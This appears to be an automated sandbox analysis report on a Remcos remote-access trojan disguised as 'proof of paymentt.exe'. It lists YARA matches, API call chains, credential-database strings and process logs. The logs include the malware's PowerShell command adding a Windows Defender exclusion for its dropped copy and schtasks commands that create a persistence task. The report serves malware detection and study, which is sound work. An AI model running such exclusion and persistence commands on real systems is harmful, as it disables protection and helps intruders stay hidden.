Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0043610D	16_2_0043610D
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00447310	16_2_00447310
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0044A490	16_2_0044A490
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0040755A	16_2_0040755A
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0043C560	16_2_0043C560
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0044B610	16_2_0044B610
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0044D6C0	16_2_0044D6C0
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_004476F0	16_2_004476F0
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0044B870	16_2_0044B870
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0044081D	16_2_0044081D
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00414957	16_2_00414957
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_004079EE	16_2_004079EE
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00407AEB	16_2_00407AEB
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0044AA80	16_2_0044AA80
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00412AA9	16_2_00412AA9
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00404B74	16_2_00404B74
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00404B03	16_2_00404B03
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0044BBD8	16_2_0044BBD8
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00404BE5	16_2_00404BE5
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00404C76	16_2_00404C76
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00415CFE	16_2_00415CFE
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00416D72	16_2_00416D72
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00446D30	16_2_00446D30
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00446D8B	16_2_00446D8B
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00406E8F	16_2_00406E8F
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00405038	17_2_00405038
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0041208C	17_2_0041208C
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_004050A9	17_2_004050A9
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0040511A	17_2_0040511A
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0043C13A	17_2_0043C13A
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_004051AB	17_2_004051AB
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00449300	17_2_00449300
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0040D322	17_2_0040D322
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0044A4F0	17_2_0044A4F0
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0043A5AB	17_2_0043A5AB
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00413631	17_2_00413631
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00446690	17_2_00446690
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0044A730	17_2_0044A730
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_004398D8	17_2_004398D8
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_004498E0	17_2_004498E0
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0044A886	17_2_0044A886
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0043DA09	17_2_0043DA09
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00438D5E	17_2_00438D5E
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00449ED0	17_2_00449ED0
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0041FE83	17_2_0041FE83
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00430F54	17_2_00430F54
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_004050C2	19_2_004050C2
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_004014AB	19_2_004014AB
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00405133	19_2_00405133
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_004051A4	19_2_004051A4
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00401246	19_2_00401246
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_0040CA46	19_2_0040CA46
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00405235	19_2_00405235
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_004032C8	19_2_004032C8
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00401689	19_2_00401689
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00402F60	19_2_00402F60

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: String function: 00401E65 appears 34 times
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: String function: 00416760 appears 69 times

Source: proof of paymentt.exe, 00000000.00000002.2040544777.00000000052D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dllD vs proof of paymentt.exe
Source: proof of paymentt.exe, 00000000.00000002.2042738474.0000000007A80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs proof of paymentt.exe
Source: proof of paymentt.exe, 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs proof of paymentt.exe
Source: proof of paymentt.exe, 00000000.00000000.1999530548.0000000000670000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBuYG.exe: vs proof of paymentt.exe
Source: proof of paymentt.exe, 00000000.00000002.2036768686.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs proof of paymentt.exe
Source: proof of paymentt.exe, 00000000.00000002.2037579032.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs proof of paymentt.exe
Source: proof of paymentt.exe, 00000000.00000002.2037579032.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dllD vs proof of paymentt.exe
Source: proof of paymentt.exe	Binary or memory string: OriginalFileName vs proof of paymentt.exe
Source: proof of paymentt.exe, 00000013.00000002.2190949329.000000000041B000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamemspass.exe8 vs proof of paymentt.exe
Source: proof of paymentt.exe	Binary or memory string: OriginalFilenameBuYG.exe: vs proof of paymentt.exe

Source: proof of paymentt.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 12.2.mQpdTSxCjbPop.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.mQpdTSxCjbPop.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.mQpdTSxCjbPop.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.proof of paymentt.exe.401a868.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.proof of paymentt.exe.401a868.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.proof of paymentt.exe.401a868.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.proof of paymentt.exe.498ecc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.proof of paymentt.exe.498ecc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.proof of paymentt.exe.498ecc8.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.proof of paymentt.exe.498ecc8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.proof of paymentt.exe.498ecc8.4.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.proof of paymentt.exe.498ecc8.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.proof of paymentt.exe.401a868.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.proof of paymentt.exe.401a868.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: proof of paymentt.exe PID: 6500, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: mQpdTSxCjbPop.exe PID: 6256, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: proof of paymentt.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mQpdTSxCjbPop.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.proof of paymentt.exe.6da0000.7.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.proof of paymentt.exe.6da0000.7.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.proof of paymentt.exe.2c58f94.0.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.proof of paymentt.exe.2c58f94.0.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.proof of paymentt.exe.2c69c0c.2.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.proof of paymentt.exe.2c69c0c.2.raw.unpack, XG.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, Uy7kHJNonmXTDU7Lsr.cs	Security API names: _0020.SetAccessControl
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, Uy7kHJNonmXTDU7Lsr.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, Uy7kHJNonmXTDU7Lsr.cs	Security API names: _0020.AddAccessRule
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, SpbYAbHt8iLHtxx4fS.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.proof of paymentt.exe.2c58f94.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.proof of paymentt.exe.6da0000.7.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.proof of paymentt.exe.2c69c0c.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: proof of paymentt.exe, 00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: .Sln\

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@41/25@3/7

Source: C:\Users\user\Desktop\proof of paymentt.exe

Code function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

16_2_004182CE

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		12_2_00417952
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,		19_2_00410DE1

Source: C:\Users\user\Desktop\proof of paymentt.exe

Code function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,

16_2_00418758

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

12_2_0040F474

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

12_2_0041B4A8

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

12_2_0041AA4A

Source: C:\Users\user\Desktop\proof of paymentt.exe

File created: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4408:120:WilError_03
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Mutant created: \Sessions\1\BaseNamedObjects\hVYNXCOwW
Source: C:\Users\user\Desktop\proof of paymentt.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-F9KCYW
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2612:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03

Source: C:\Users\user\Desktop\proof of paymentt.exe

File created: C:\Users\user\AppData\Local\Temp\tmp73D0.tmp

Jump to behavior

Source: proof of paymentt.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: proof of paymentt.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\proof of paymentt.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Users\user\Desktop\proof of paymentt.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\proof of paymentt.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: proof of paymentt.exe, proof of paymentt.exe, 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: proof of paymentt.exe, proof of paymentt.exe, 00000011.00000002.2190655844.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: proof of paymentt.exe, 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: proof of paymentt.exe, proof of paymentt.exe, 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: proof of paymentt.exe, proof of paymentt.exe, 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: proof of paymentt.exe, proof of paymentt.exe, 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: proof of paymentt.exe, 00000010.00000002.2199391458.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, chp964E.tmp.16.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: proof of paymentt.exe, proof of paymentt.exe, 00000010.00000002.2198588685.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: proof of paymentt.exe	Virustotal: Detection: 45%
Source: proof of paymentt.exe	ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\proof of paymentt.exe

File read: C:\Users\user\Desktop\proof of paymentt.exe

Jump to behavior

Source: C:\Users\user\Desktop\proof of paymentt.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe"
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process created: C:\Users\user\Desktop\proof of paymentt.exe "C:\Users\user\Desktop\proof of paymentt.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp7E5F.tmp"
